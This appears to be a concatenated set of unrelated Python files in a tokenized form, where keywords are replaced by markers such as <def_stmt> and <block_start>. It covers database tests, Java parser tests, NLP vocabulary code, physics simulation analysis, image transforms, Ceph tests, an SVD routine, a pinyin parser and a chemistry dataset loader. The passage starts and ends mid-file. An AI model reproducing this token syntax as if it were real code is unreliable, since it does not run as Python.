self).setUp(type='Bucket')<block_end>@asynct@asyncio.coroutine<def_stmt>test_query self<block_start>beer_bucket=self.gen_cluster(**self.make_connargs()).bucket('beer-sample')<line_sep><yield><from>(beer_bucket.on_connect()<or>asyncio.sleep(0.01))<line_sep>viewiter=beer_bucket.view_query("beer" "brewery_beers" limit=10)<line_sep><yield><from>viewiter.future<line_sep>count=len(list(viewiter))<line_sep>self.assertEqual(count 10)<block_end><block_end><class_stmt>CouchbaseDefaultTestKV(AioTestCase)<block_start>@asynct@asyncio.coroutine<def_stmt>test_upsert self<block_start><import_stmt>uuid<line_sep>expected=str(uuid.uuid4())<line_sep>default_collection=self.gen_collection(**self.make_connargs())<line_sep><yield><from>(default_collection.on_connect()<or>asyncio.sleep(0.01))<line_sep><yield><from>default_collection.upsert('hello' {"key":expected})<line_sep>obtained=<yield><from>default_collection.get('hello')<line_sep>self.assertEqual({"key":expected} obtained.content)<block_end><block_end><class_stmt>AIOClusterTest(AioTestCase)<block_start><def_stmt>setUp self **kwargs<block_start>super(AIOClusterTest self).setUp(**kwargs)<block_end>@asynct@asyncio.coroutine<def_stmt>test_n1ql self<block_start>cluster=self.gen_cluster(**self.make_connargs())<line_sep><yield><from>(cluster.on_connect()<or>asyncio.sleep(0.01))<line_sep>it=cluster.query(self.query_props.statement)<line_sep><yield><from>it.future<line_sep>data=list(it)<line_sep>self.assertEqual(self.query_props.rowcount len(data))<block_end>@asynct@asyncio.coroutine<def_stmt>test_search self# type: Base <block_start>cluster=self.gen_cluster(**self.make_connargs())<line_sep><yield><from>(cluster.on_connect()<or>asyncio.sleep(0.01))<try_stmt><block_start>it=cluster.search_query("beer-search" SEARCH.TermQuery("category") facets={'fred':SEARCH.TermFacet('category' 10)})<line_sep><yield><from>it.future<line_sep>data=list(it)<line_sep>self.assertIsInstance(it AsyncSearchResult)<line_sep>self.assertEqual(10 len(data))<block_end><except_stmt>SearchException<as>e<block_start><if_stmt>isinstance(e.inner_cause NotSupportedException)<and>self.is_mock<block_start><raise>SkipTest("Not supported")<block_end><block_end><block_end><block_end><class_stmt>AnalyticsTest(AioTestCase)<block_start><def_stmt>testBatchedAnalytics self# type: Base <block_start>cluster=self.gen_cluster(**self.make_connargs())<line_sep><yield><from>(cluster.on_connect()<or>asyncio.sleep(0.01))<line_sep>it=cluster.analytics_query("SELECT * FROM `{}` LIMIT 1".format(self.dataset_name))<line_sep><yield><from>it.future<line_sep>self.assertIsInstance(it AsyncAnalyticsResult)<line_sep>self.assertEqual(1 len(it.rows()))<block_end><block_end>
<import_stmt>unittest<import_from_stmt>pkg_resources resource_string<import_from_stmt>.. parse parser tree<def_stmt>setup_java_class content_to_add<block_start>""" returns an example java class with the given content_to_add contained within a method. """<line_sep>template=""" public class Lambda { public static void main(String args[]) { %s } } """<line_sep><return>template%content_to_add<block_end><def_stmt>filter_type_in_method clazz the_type method_name<block_start>""" yields the result of filtering the given class for the given type inside the given method identified by its name. """<for_stmt>path,node clazz.filter(the_type)<block_start><for_stmt>p reversed(path)<block_start><if_stmt>isinstance(p tree.MethodDeclaration)<block_start><if_stmt>p.name<eq>method_name<block_start><yield>path node<block_end><block_end><block_end><block_end><block_end><class_stmt>LambdaSupportTest(unittest.TestCase)<block_start>""" Contains tests for java 8 lambda syntax. """<def_stmt>assert_contains_lambda_expression_in_m self clazz method_name='main'<block_start>""" asserts that the given tree contains a method with the supplied method name containing a lambda expression. """<line_sep>matches=list(filter_type_in_method(clazz tree.LambdaExpression method_name))<if_stmt><not>matches<block_start>self.fail('No matching lambda expression found.')<block_end><return>matches<block_end><def_stmt>test_lambda_support_no_parameters_no_body self<block_start>""" tests support for lambda with no parameters and no body. """<line_sep>self.assert_contains_lambda_expression_in_m(parse.parse(setup_java_class("() -> {};")))<block_end><def_stmt>test_lambda_support_no_parameters_expression_body self<block_start>""" tests support for lambda with no parameters and an expression body. """<line_sep>test_classes=[setup_java_class("() -> 3;") setup_java_class("() -> null;") setup_java_class("() -> { return 21; };") setup_java_class("() -> { System.exit(1); };") ]<for_stmt>test_class test_classes<block_start>clazz=parse.parse(test_class)<line_sep>self.assert_contains_lambda_expression_in_m(clazz)<block_end><block_end><def_stmt>test_lambda_support_no_parameters_complex_expression self<block_start>""" tests support for lambda with no parameters and a complex expression body. """<line_sep>code=""" () -> { if (true) return 21; else { int result = 21; return result / 2; } };"""<line_sep>self.assert_contains_lambda_expression_in_m(parse.parse(setup_java_class(code)))<block_end><def_stmt>test_parameter_no_type_expression_body self<block_start>""" tests support for lambda with parameters with inferred types. """<line_sep>test_classes=[setup_java_class("(bar) -> bar + 1;") setup_java_class("bar -> bar + 1;") setup_java_class("x -> x.length();") setup_java_class("y -> { y.boom(); };") ]<for_stmt>test_class test_classes<block_start>clazz=parse.parse(test_class)<line_sep>self.assert_contains_lambda_expression_in_m(clazz)<block_end><block_end><def_stmt>test_parameter_with_type_expression_body self<block_start>""" tests support for lambda with parameters with formal types. """<line_sep>test_classes=[setup_java_class("(int foo) -> { return foo + 2; };") setup_java_class("(String s) -> s.length();") setup_java_class("(int foo) -> foo + 1;") setup_java_class("(Thread th) -> { th.start(); };") setup_java_class("(String foo, String bar) -> "<concat>"foo + bar;") ]<for_stmt>test_class test_classes<block_start>clazz=parse.parse(test_class)<line_sep>self.assert_contains_lambda_expression_in_m(clazz)<block_end><block_end><def_stmt>test_parameters_with_no_type_expression_body self<block_start>""" tests support for multiple lambda parameters that are specified without their types. """<line_sep>self.assert_contains_lambda_expression_in_m(parse.parse(setup_java_class("(x, y) -> x + y;")))<block_end><def_stmt>test_parameters_with_mixed_inferred_and_declared_types self<block_start>""" this tests that lambda type specification mixing is considered invalid as per the specifications. """<with_stmt>self.assertRaises(parser.JavaSyntaxError)<block_start>parse.parse(setup_java_class("(x, int y) -> x+y;"))<block_end><block_end><def_stmt>test_parameters_inferred_types_with_modifiers self<block_start>""" this tests that lambda inferred type parameters with modifiers are considered invalid as per the specifications. """<with_stmt>self.assertRaises(parser.JavaSyntaxError)<block_start>parse.parse(setup_java_class("(x, final y) -> x+y;"))<block_end><block_end><def_stmt>test_invalid_parameters_are_invalid self<block_start>""" this tests that invalid lambda parameters are are considered invalid as per the specifications. """<with_stmt>self.assertRaises(parser.JavaSyntaxError)<block_start>parse.parse(setup_java_class("(a b c) -> {};"))<block_end><block_end><def_stmt>test_cast_works self<block_start>""" this tests that a cast expression works as expected. """<line_sep>parse.parse(setup_java_class("String x = (String) A.x() ;"))<block_end><block_end><class_stmt>MethodReferenceSyntaxTest(unittest.TestCase)<block_start>""" Contains tests for java 8 method reference syntax. """<def_stmt>assert_contains_method_reference_expression_in_m self clazz method_name='main'<block_start>""" asserts that the given class contains a method with the supplied method name containing a method reference. """<line_sep>matches=list(filter_type_in_method(clazz tree.MethodReference method_name))<if_stmt><not>matches<block_start>self.fail('No matching method reference found.')<block_end><return>matches<block_end><def_stmt>test_method_reference self<block_start>""" tests that method references are supported. """<line_sep>self.assert_contains_method_reference_expression_in_m(parse.parse(setup_java_class("String::length;")))<block_end><def_stmt>test_method_reference_to_the_new_method self<block_start>""" test support for method references to 'new'. """<line_sep>self.assert_contains_method_reference_expression_in_m(parse.parse(setup_java_class("String::new;")))<block_end><def_stmt>test_method_reference_to_the_new_method_with_explict_type self<block_start>""" test support for method references to 'new' with an explicit type. """<line_sep>self.assert_contains_method_reference_expression_in_m(parse.parse(setup_java_class("String::<String> new;")))<block_end><def_stmt>test_method_reference_from_super self<block_start>""" test support for method references from 'super'. """<line_sep>self.assert_contains_method_reference_expression_in_m(parse.parse(setup_java_class("super::toString;")))<block_end><def_stmt>test_method_reference_from_super_with_identifier self<block_start>""" test support for method references from Identifier.super. """<line_sep>self.assert_contains_method_reference_expression_in_m(parse.parse(setup_java_class("String.super::toString;")))<block_end>@unittest.expectedFailure<def_stmt>test_method_reference_explicit_type_arguments_for_generic_type self<block_start>""" currently there is no support for method references for an explicit type. """<line_sep>self.assert_contains_method_reference_expression_in_m(parse.parse(setup_java_class("List<String>::size;")))<block_end><def_stmt>test_method_reference_explicit_type_arguments self<block_start>""" test support for method references with an explicit type. """<line_sep>self.assert_contains_method_reference_expression_in_m(parse.parse(setup_java_class("Arrays::<String> sort;")))<block_end>@unittest.expectedFailure<def_stmt>test_method_reference_from_array_type self<block_start>""" currently there is no support for method references from a primary type. """<line_sep>self.assert_contains_method_reference_expression_in_m(parse.parse(setup_java_class("int[]::new;")))<block_end><block_end><class_stmt>InterfaceSupportTest(unittest.TestCase)<block_start>""" Contains tests for java 8 interface extensions. """<def_stmt>test_interface_support_static_methods self<block_start>parse.parse(""" interface Foo { void foo(); static Foo create() { return new Foo() { @Override void foo() { System.out.println("foo"); } }; } } """)<block_end><def_stmt>test_interface_support_default_methods self<block_start>parse.parse(""" interface Foo { default void foo() { System.out.println("foo"); } } """)<block_end><block_end><def_stmt>main <block_start>unittest.main()<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
__all__=["ConsigneeId" "PackageStatus"]<import_from_stmt>shipping.domain.value_objects.package_status PackageStatus<line_sep>ConsigneeId=int<line_sep>
<import_from_stmt>gzip compress GzipFile <import_stmt>numpy<as>np<import_from_stmt>.record Record<line_sep>UNK='<unk>'<line_sep>PAD='<pad>'<class_stmt>Vocab(Record)<block_start>__attributes__=['words' 'counts']<def_stmt>__init__ self words counts<block_start>self.words=words<line_sep>self.counts=counts<line_sep>self.word_ids={word:id<for>id,word enumerate(self.words)}<line_sep>self.unk_id=self.word_ids.get(UNK)<line_sep>self.pad_id=self.word_ids.get(PAD)<block_end><def_stmt>__getitem__ self word<block_start><return>self.word_ids[word]<block_end><def_stmt>__contains__ self word<block_start><return>word<in>self.word_ids<block_end><def_stmt>get self word default=<none><block_start><if_stmt>word<in>self<block_start><return>self[word]<block_end><return>default<block_end><def_stmt>count self word<block_start><return>self.counts[self.word_ids[word]]<block_end><def_stmt>top self count=<none><block_start><return>sorted(self.words key=self.count reverse=<true>)[:count]<block_end><def_stmt>sampled self words<block_start>words=list(words)<line_sep>counts=[self.counts[self.word_ids[_]]<for>_ words]<line_sep><return>Vocab(words counts)<block_end><def_stmt>__repr__ self<block_start><return>'{name}(words=[...], counts=[...])'.format(name=self.__class__.__name__)<block_end><def_stmt>_repr_pretty_ self printer cycle<block_start>printer.text(repr(self))<block_end>@classmethod<def_stmt>from_glove cls words counts# for some reason glove vocab may have words with broken # unicode <block_start>words=[_.decode('utf8' errors='ignore')<for>_ words]<line_sep># emb has unk in the end <for_stmt>word (UNK PAD)<block_start>words.append(word)<line_sep>counts.append(0)<block_end><return>cls(words counts)<block_end>@property<def_stmt>as_glove self<block_start><for_stmt>word,count zip(self.words self.counts)<block_start><if_stmt>word<in>(UNK PAD)<block_start><continue><block_end>word=word.encode('utf8')<line_sep><yield>word count<block_end><block_end>@property<def_stmt>as_bytes self<block_start>meta=[len(self.counts)]<line_sep>meta=np.array(meta).astype(np.uint32).tobytes()<line_sep>words='\n'.join(self.words)<line_sep>words=words.encode('utf8')<line_sep>counts=np.array(self.counts dtype=np.uint32).tobytes()<line_sep><return>compress(meta+counts+words)<block_end>@classmethod<def_stmt>from_file cls file<block_start>file=GzipFile(mode='rb' fileobj=file)<line_sep>buffer=file.read(4)<line_sep>size,=np.frombuffer(buffer np.uint32)<line_sep>buffer=file.read(4<times>size)<line_sep>counts=np.frombuffer(buffer np.uint32).tolist()<line_sep>text=file.read().decode('utf8')<line_sep>words=text.splitlines()<line_sep><return>cls(words counts)<block_end><block_end>
# -*- coding: utf-8 -*- """ Created on Tue Aug 22 11:21:01 2017 @author: Zlatko """<import_from_stmt>pyEPR *<if_stmt>0# Specify the HFSS project to be analyzed <block_start>project_info=ProjectInfo(r"X:\Simulation\\hfss\\KC\\")<line_sep>project_info.project_name='2013-12-03_9GHzCavity'# Name of the project file (string). "None" will get the current active one. project_info.design_name='9GHz_EM_center_SNAIL'# Name of the desgin file (string). "None" will get the current active one. project_info.setup_name=<none># Name of the setup(string). "None" will get the current active one. ## Describe the junctions in the HFSS desgin project_info.junctions['snail']={'rect':'qubit' 'line':'JunctionLine' 'Lj_variable':'LJ' 'length':0.0001}<line_sep># project_info.junctions['jBob'] = {'rect':'qubitBob', 'line': 'bob_line', 'Lj_variable':'LJBob', 'length':0.0001} # Dissipative elments EPR project_info.dissipative['dielectric_surfaces']=<none># supply names here, there are more options in project_info.dissipative. # Run analysis epr_hfss=DistributedAnalysis(project_info)<line_sep>epr_hfss.do_EPR_analysis()<block_end>#variations = ['1', '70'] <if_stmt>1# Hamiltonian analysis # filename = epr_hfss.data_filename <block_start>filename=r'X:\Simulation\hfss\KC\pyEPR_results_2018\2013-12-03_9GHzCavity\9GHz_EM_center_SNAIL\9GHz_EM_center_SNAIL_20180726_170049.hdf5'<line_sep>#filename = r'C:\\Users\\rslqulab\\Desktop\\zkm\\2017_pyEPR_data\\\\/2017_08_Zlatko_Shyam_AutStab/2 pyEPR/2 pyEPR_20170825_170550.hdf5' epr=QuantumAnalysis(filename)<line_sep>#result = epr.analyze_variation('1', cos_trunc = 8, fock_trunc = 7) epr.analyze_all_variations(cos_trunc=<none> fock_trunc=4)# only quadratic part epr.plot_hamiltonian_results()<if_stmt>1<block_start><import_from_stmt>pyEPR.toolbox_plotting cmap_discrete<line_sep>f0=epr.results.get_frequencies_HFSS()<line_sep>f1=epr.results.get_frequencies_O1()<line_sep>chi=epr.results.get_chi_O1()<line_sep>mode_idx=list(f0.index)<line_sep>nmodes=len(mode_idx)<line_sep>cmap=cmap_discrete(nmodes)<block_end><block_end>
<import_stmt>random<import_stmt>numpy<as>np<import_stmt>cv2<import_from_stmt>utils.transforms.transforms CustomTransform<class_stmt>RandomFlip(CustomTransform)<block_start><def_stmt>__init__ self prob_x=0 prob_y=0<block_start>""" Arguments: ---------- prob_x: range [0, 1], probability to use horizontal flip, setting to 0 means disabling flip prob_y: range [0, 1], probability to use vertical flip """<line_sep>self.prob_x=prob_x<line_sep>self.prob_y=prob_y<block_end><def_stmt>__call__ self sample<block_start>img=sample.get('img').copy()<line_sep>segLabel=sample.get('segLabel' <none>)<if_stmt>segLabel<is><not><none><block_start>segLabel=segLabel.copy()<block_end>flip_x=np.random.choice([<false> <true>] p=(1-self.prob_x self.prob_x))<line_sep>flip_y=np.random.choice([<false> <true>] p=(1-self.prob_y self.prob_y))<if_stmt>flip_x<block_start>img=np.ascontiguousarray(np.flip(img axis=1))<if_stmt>segLabel<is><not><none><block_start>segLabel=np.ascontiguousarray(np.flip(segLabel axis=1))<block_end><block_end><if_stmt>flip_y<block_start>img=np.ascontiguousarray(np.flip(img axis=0))<if_stmt>segLabel<is><not><none><block_start>segLabel=np.ascontiguousarray(np.flip(segLabel axis=0))<block_end><block_end>_sample=sample.copy()<line_sep>_sample['img']=img<line_sep>_sample['segLabel']=segLabel<line_sep><return>_sample<block_end><block_end><class_stmt>Darkness(CustomTransform)<block_start><def_stmt>__init__ self coeff<block_start><assert_stmt>coeff<ge>1. "Darkness coefficient must be greater than 1"<line_sep>self.coeff=coeff<block_end><def_stmt>__call__ self sample<block_start>img=sample.get('img')<line_sep>coeff=np.random.uniform(1. self.coeff)<line_sep>img=(img.astype('float32')/coeff).astype('uint8')<line_sep>_sample=sample.copy()<line_sep>_sample['img']=img<line_sep><return>_sample<block_end><block_end>
<import_stmt>logging<import_stmt>pytest<import_stmt>time<import_stmt>random<import_from_stmt>ocs_ci.framework.testlib ManageTest tier2 skipif_ocs_version bugzilla skipif_external_mode <import_from_stmt>ocs_ci.ocs.resources.pod get_ceph_tools_pod get_osd_pods get_osd_pod_id<import_from_stmt>ocs_ci.utility.utils TimeoutSampler<import_from_stmt>ocs_ci.ocs.exceptions CommandFailed<line_sep>log=logging.getLogger(__name__)<line_sep>@tier2@bugzilla("1938049")@skipif_ocs_version("<4.6")@pytest.mark.polarion_id("OCS-2512")@skipif_external_mode<class_stmt>TestOSDHeapProfile(ManageTest)<block_start>""" 1.Start heap profiler for osd $ oc exec rook-ceph-tools-85ccf9f7c5-v7bgk ceph tell osd.0 heap start_profiler 2.Dump heap profile $ oc exec rook-ceph-tools-85ccf9f7c5-v7bgk ceph tell osd.0 heap dump 3.Get heap profile in /var/log/ceph dir on osd node $ oc rsh rook-ceph-osd-0-959dbdc6d-pddd4 sh-4.4# ls -ltr /var/log/ceph/ -rw-r--r--. 1 ceph ceph 295891 Apr 11 14:33 osd.0.profile.0001.heap """<def_stmt>test_osd_heap_profile self<block_start>""" Generate heap profile dump file for OSDs and verify whether the file is created on '/var/log/ceph/' """<line_sep>strings_err=["error" "fail"]<line_sep>osd_pods=get_osd_pods()<line_sep>osd_id=str(random.randint(0 len(osd_pods)-1))<line_sep>log.info(f"Start heap profiler for osd-{osd_id}")<line_sep>pod_tool=get_ceph_tools_pod()<line_sep>out=pod_tool.exec_cmd_on_pod(command=f"ceph tell osd.{osd_id} heap start_profiler" out_yaml_format=<false>)<line_sep>logging.info(f"command output:{out}")<for_stmt>string_err strings_err<block_start><assert_stmt>(string_err<not><in>out.lower()) f"{string_err} on the output command {out}"<block_end>logging.info("Sleep 10 sec, for running heap profiler")<line_sep>time.sleep(10)<line_sep>log.info("Dump heap profile")<line_sep>out=pod_tool.exec_sh_cmd_on_pod(command=f"ceph tell osd.{osd_id} heap dump")<line_sep>logging.info(out)<for_stmt>string_err strings_err<block_start><assert_stmt>(string_err<not><in>out.lower()) f"{string_err} on the output command {out}"<block_end>log.info(f"Get osd-{osd_id} pod object")<for_stmt>osd_pod osd_pods<block_start><if_stmt>get_osd_pod_id(osd_pod)<eq>osd_id<block_start>osd_pod_profile=osd_pod<block_end><block_end>osd_profile_str=f"osd.{osd_id}.profile"<line_sep>log.info(f"Verify {osd_profile_str} log exist on /var/log/ceph/")<line_sep>sample=TimeoutSampler(timeout=100 sleep=10 func=self.verify_output_command_osd_pod command="ls -ltr /var/log/ceph/" pod_obj=osd_pod_profile str_to_check=osd_profile_str )<if_stmt><not>sample.wait_for_func_status(result=<true>)<block_start>log.error(f"{osd_profile_str} log does not exist on /var/log/ceph")<line_sep><raise>ValueError(f"{osd_profile_str} log does not exist on /var/log/ceph")<block_end>log.info(f"osd.{osd_id}.profile log exist on /var/log/ceph")<block_end><def_stmt>verify_output_command_osd_pod self command pod_obj str_to_check<block_start>""" Check the output of the command (from osd pod) Args: command (str): command run on osd pod pod_obj (obj): pod object str_to_check (str): check if the string is contained on output command Returns: bool: True if we find the string in output, False otherwise """<try_stmt><block_start>out=pod_obj.exec_cmd_on_pod(command=command)<line_sep>log.info(f"the output of the command {command}: {out}")<line_sep><return><true><if>str_to_check<in>out<else><false><block_end><except_stmt>CommandFailed<as>e<block_start>log.error(e)<line_sep><return><false><block_end><block_end><block_end>
<import_from_stmt>head.metrics *<import_from_stmt>head.metrics_parallel *<line_sep>HEAD_DICT={"Softmax":Softmax "ArcFace":ArcFace "Combined":Combined "CosFace":CosFace "SphereFace":SphereFace "Am_softmax":Am_softmax "CurricularFace":CurricularFace "ArcNegFace":ArcNegFace "SVX":SVXSoftmax "AirFace":AirFace "QAMFace":QAMFace "CircleLoss":CircleLoss "ParallelArcFace":ParallelArcFace }<line_sep>
<import_stmt>spartan<import_from_stmt>spartan core expr util blob_ctx<import_stmt>numpy<as>np<import_from_stmt>.qr qr<def_stmt>svd A k=<none><block_start>""" Stochastic SVD. Parameters ---------- A : spartan matrix Array to compute the SVD on, of shape (M, N) k : int, optional Number of singular values and vectors to compute. The operations include matrix multiplication and QR decomposition. We parallelize both of them. Returns -------- U : Spartan array of shape (M, k) S : numpy array of shape (k,) V : numpy array of shape (k, k) """<if_stmt>k<is><none><block_start>k=A.shape[1]<block_end>Omega=expr.randn(A.shape[1] k)<line_sep>Y=expr.dot(A Omega)<line_sep>Q,R=qr(Y)<line_sep>B=expr.dot(expr.transpose(Q) A)<line_sep>BTB=expr.dot(B expr.transpose(B)).optimized().glom()<line_sep>S,U_=np.linalg.eig(BTB)<line_sep>S=np.sqrt(S)<line_sep># Sort by eigen values from large to small si=np.argsort(S)[::-1]<line_sep>S=S[si]<line_sep>U_=U_[: si]<line_sep>U=expr.dot(Q U_).optimized().evaluate()<line_sep>V=np.dot(np.dot(expr.transpose(B).optimized().glom() U_) np.diag(np.ones(S.shape[0])/S))<line_sep><return>U S V.T<block_end>
<import_stmt>os<import_from_stmt>util register<line_sep>mandarin_initial_list=["b" "ch" "c" "d" "f" "g" "h" "j" "k" "l" "m" "n" "p" "q" "r" "sh" "s" "t" "x" "zh" "z"]<line_sep># fuse rear case to avoid OOV special_phone_map={}<line_sep># punc list punc_list=['_FH' '_MH' '_DUN' '_DH' '_WH' '_OPUNC']<line_sep>special_phn_list=['_WORD_SEG#1' '_WORD_SEG#2' '_WORD_SEG#3' '_WORD_SEG#4' '_HEAD' '_SPS_SEG' '_JH_E' '_WH_E' '_TH_E']<line_sep># func puncs punc_map={'_FH':'_FH' '_MH':'_MH' '_DUN':'_DUN' '_DH':'_DH' '_WH':'_WH' '_TH':'_TH' '_DYH':'_OPUNC' '_KH':'_OPUNC' '_PZH':'_OPUNC' '_SLH':'_OPUNC' '_SMH':'_OPUNC' '_SYH':'_OPUNC' '_YD':'_OPUNC'}<line_sep>final_punc_map={'_DH_E':'_JH_E' '_JH':'_DH' '_OPUNC_E':'_JH_E'}<line_sep>parse_pinyin_methods={}<line_sep>parse_line_methods={}<line_sep>parse_sent_methods={}<def_stmt>split_phone_tone s<block_start>head=s.rstrip('0123456')<if_stmt>len(head)<eq>len(s)<block_start>phn_tone=[s]<block_end><else_stmt><block_start>tail=s[len(head):]<line_sep>phn_tone=[head tail]<block_end><return>phn_tone<block_end>@register.register('PHN_TONE_SEP' parse_pinyin_methods)<def_stmt>parse_pinyin_phn_tone_sep py<block_start>phns=py.split('-')<line_sep>phns_tone=[]<for_stmt>i phns<block_start><if_stmt>i<in>special_phone_map<block_start>i=special_phone_map[i]<block_end>phns_tone.extend(split_phone_tone(i))<block_end>outputs=[]<if_stmt>py.islower()<block_start>outputs.extend(phns_tone)<block_end><else_stmt><block_start>outputs.extend(phns_tone)<block_end><return>outputs<block_end>@register.register('PHN_TONE' parse_pinyin_methods)<def_stmt>parse_pinyin_phn_tone py<block_start>phns=py.split('-')<line_sep>outputs=[]<if_stmt>py.islower()<block_start><if_stmt>len(phns)<eq>1<block_start>outputs.extend([phns[0]])<block_end><else_stmt><block_start>yun_tail=phns[-1]<if_stmt>yun_tail<in>special_phone_map<block_start>yun_tail=special_phone_map[yun_tail]<block_end>outputs.extend(phns[:-1]+[yun_tail])<block_end><block_end><else_stmt><block_start><for_stmt>phn phns<block_start><if_stmt>phn<in>special_phone_map<block_start>outputs.append(special_phone_map[phn])<block_end><else_stmt><block_start>outputs.append(phn)<block_end><block_end><block_end><return>outputs<block_end><def_stmt>parse_pinyin pronoun_line py_type<block_start>parts=pronoun_line.split()<line_sep>pinyin_str=parts[-1]<line_sep>pinyins=[py<for>py pinyin_str.split("|")<if>py<ne>""]<try_stmt><block_start>outputs=[]<for_stmt>py pinyins<block_start>outputs.extend(['_SPS_SEG'])<line_sep>outputs.extend(parse_pinyin_methods[py_type](py))<block_end><block_end><except_stmt>KeyError<block_start><raise>ValueError('parse_pinyin for [{}] is not implemented'.format(py_type))<block_end><return>outputs<block_end><def_stmt>parse_punct pronoun_line<block_start>parts=pronoun_line.split()<line_sep>punct_part=parts[3]<line_sep>prosody_word_seg_sign=parts[-2]<if_stmt>prosody_word_seg_sign<eq>'#0'<block_start>suffix=[]<block_end><else_stmt><block_start><if_stmt>punct_part<ne>'0'<block_start>punc='_'+punct_part.upper()<if_stmt>punc<in>punc_map<block_start>punc=punc_map[punc]<block_end>suffix=['_WORD_SEG'+prosody_word_seg_sign]+[punc]<block_end><else_stmt><block_start>suffix=['_WORD_SEG'+prosody_word_seg_sign]<block_end><block_end><return>suffix<block_end><def_stmt>parse_pos pronoun_line<block_start>parts=pronoun_line.split()<line_sep>pos_part=parts[1]<line_sep>pos='~'+pos_part<line_sep><return>pos<block_end>@register.register(['PHN' 'PHN_TONE' 'PHN_TONE_SEP' 'SHENGYUN'] parse_line_methods)<def_stmt>parse_line_default pronoun_line py_type<block_start>pinyins=parse_pinyin(pronoun_line py_type)<line_sep>punc=parse_punct(pronoun_line)<line_sep><return>pinyins+punc<block_end><def_stmt>parse_line pronoun_line py_type<block_start><try_stmt><block_start><return>parse_line_methods[py_type](pronoun_line py_type)<block_end><except_stmt>KeyError<block_start><raise>ValueError('parse_line for [{}] is not implemented'.format(py_type))<block_end><block_end>@register.register(['PHN' 'PHN_TONE' 'PHN_TONE_SEP' 'SHENGYUN'] parse_sent_methods)<def_stmt>parse_sent_default pronoun_lines py_type use_head use_tail<block_start><if_stmt>use_head<block_start>sent_outputs=['_HEAD']<block_end><else_stmt><block_start>sent_outputs=[]<block_end><for_stmt>line_idx,pronoun_line enumerate(pronoun_lines)<block_start><if_stmt>pronoun_line<eq>''<or>pronoun_line.startswith('#')<or>pronoun_line.startswith('[')<block_start><continue><block_end><else_stmt><block_start>line_outputs=parse_line(pronoun_line py_type)<if_stmt>line_idx<eq>len(pronoun_lines)-1<and>line_outputs[-1].startswith('_')<block_start>line_outputs[-1]<augadd>'_E'<block_end>sent_outputs.extend(line_outputs)<block_end><block_end><for_stmt>phn_idx,phn_item enumerate(sent_outputs)<block_start><try_stmt><block_start>sent_outputs[phn_idx]=final_punc_map[phn_item]<block_end><except_stmt>KeyError<as>e<block_start><pass><block_end><block_end><if_stmt>use_tail<block_start>sent_outputs.append('_TAIL')<block_end><return>sent_outputs<block_end><def_stmt>parse_sent pronoun_lines py_type use_head=<true> use_tail=<true><block_start><try_stmt><block_start><return>parse_sent_methods[py_type](pronoun_lines py_type use_head use_tail)<block_end><except_stmt>KeyError<block_start><raise>ValueError('parse_sent for [{}] is not implemented'.format(py_type))<block_end><block_end>
# -*- coding: utf-8 -*- # # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 # # PCBA from MoleculeNet for the prediction of biological activities <import_stmt>pandas<as>pd<import_from_stmt>dgl.data.utils get_download_dir download _get_dgl_url extract_archive<import_from_stmt>.csv_dataset MoleculeCSVDataset<import_from_stmt>..utils.mol_to_graph smiles_to_bigraph<line_sep>__all__=['PCBA']<class_stmt>PCBA(MoleculeCSVDataset)<block_start>r"""PCBA from MoleculeNet for the prediction of biological activities PubChem BioAssay (PCBA) is a database consisting of biological activities of small molecules generated by high-throughput screening. This dataset is a subset of PCBA, containing 128 bioassays measured over 400 thousand compounds. References: * [1] MoleculeNet: A Benchmark for Molecular Machine Learning. * [2] Massively Multitask Networks for Drug Discovery. Parameters ---------- smiles_to_graph: callable, str -> DGLGraph A function turning a SMILES string into a DGLGraph. Default to :func:`dgllife.utils.smiles_to_bigraph`. node_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict Featurization for nodes like atoms in a molecule, which can be used to update ndata for a DGLGraph. Default to None. edge_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict Featurization for edges like bonds in a molecule, which can be used to update edata for a DGLGraph. Default to None. load : bool Whether to load the previously pre-processed dataset or pre-process from scratch. ``load`` should be False when we want to try different graph construction and featurization methods and need to preprocess from scratch. Default to False. log_every : bool Print a message every time ``log_every`` molecules are processed. Default to 1000. cache_file_path : str Path to the cached DGLGraphs, default to 'pcba_dglgraph.bin'. n_jobs : int The maximum number of concurrently running jobs for graph construction and featurization, using joblib backend. Default to 1. Examples -------- >>> import torch >>> from dgllife.data import PCBA >>> from dgllife.utils import smiles_to_bigraph, CanonicalAtomFeaturizer >>> dataset = PCBA(smiles_to_bigraph, CanonicalAtomFeaturizer()) >>> # Get size of the dataset >>> len(dataset) 437929 >>> # Get the 0th datapoint, consisting of SMILES, DGLGraph, labels, and masks >>> dataset[0] ('CC(=O)N1CCC2(CC1)NC(=O)N(c1ccccc1)N2', DGLGraph(num_nodes=20, num_edges=44, ndata_schemes={'h': Scheme(shape=(74,), dtype=torch.float32)} edata_schemes={}), tensor([0., ..., 0.]), tensor([1., ..., 0.])) The dataset instance also contains information about molecule ids. >>> dataset.ids[i] We can also get the id along with SMILES, DGLGraph, labels, and masks at once. >>> dataset.load_full = True >>> dataset[0] ('CC(=O)N1CCC2(CC1)NC(=O)N(c1ccccc1)N2', DGLGraph(num_nodes=20, num_edges=44, ndata_schemes={'h': Scheme(shape=(74,), dtype=torch.float32)} edata_schemes={}), tensor([0., ..., 0.]), tensor([1., ..., 0.]), 'CID1511280') To address the imbalance between positive and negative samples, we can re-weight positive samples for each task based on the training datapoints. >>> train_ids = torch.arange(1000) >>> dataset.task_pos_weights(train_ids) tensor([7.3400, 489.0000, ..., 1.0000]) """<def_stmt>__init__ self smiles_to_graph=smiles_to_bigraph node_featurizer=<none> edge_featurizer=<none> load=<false> log_every=1000 cache_file_path='./pcba_dglgraph.bin' n_jobs=1<block_start>self._url='dataset/pcba.zip'<line_sep>data_path=get_download_dir()+'/pcba.zip'<line_sep>dir_path=get_download_dir()+'/pcba'<line_sep>download(_get_dgl_url(self._url) path=data_path overwrite=<false>)<line_sep>extract_archive(data_path dir_path)<line_sep>df=pd.read_csv(dir_path+'/pcba.csv')<line_sep>self.ids=df['mol_id'].tolist()<line_sep>self.load_full=<false><line_sep>df=df.drop(columns=['mol_id'])<line_sep>super(PCBA self).__init__(df=df smiles_to_graph=smiles_to_graph node_featurizer=node_featurizer edge_featurizer=edge_featurizer smiles_column='smiles' cache_file_path=cache_file_path load=load log_every=log_every init_mask=<true> n_jobs=n_jobs)<line_sep>self.ids=[self.ids[i]<for>i self.valid_ids]<block_end><def_stmt>__getitem__ self item<block_start>"""Get datapoint with index Parameters ---------- item : int 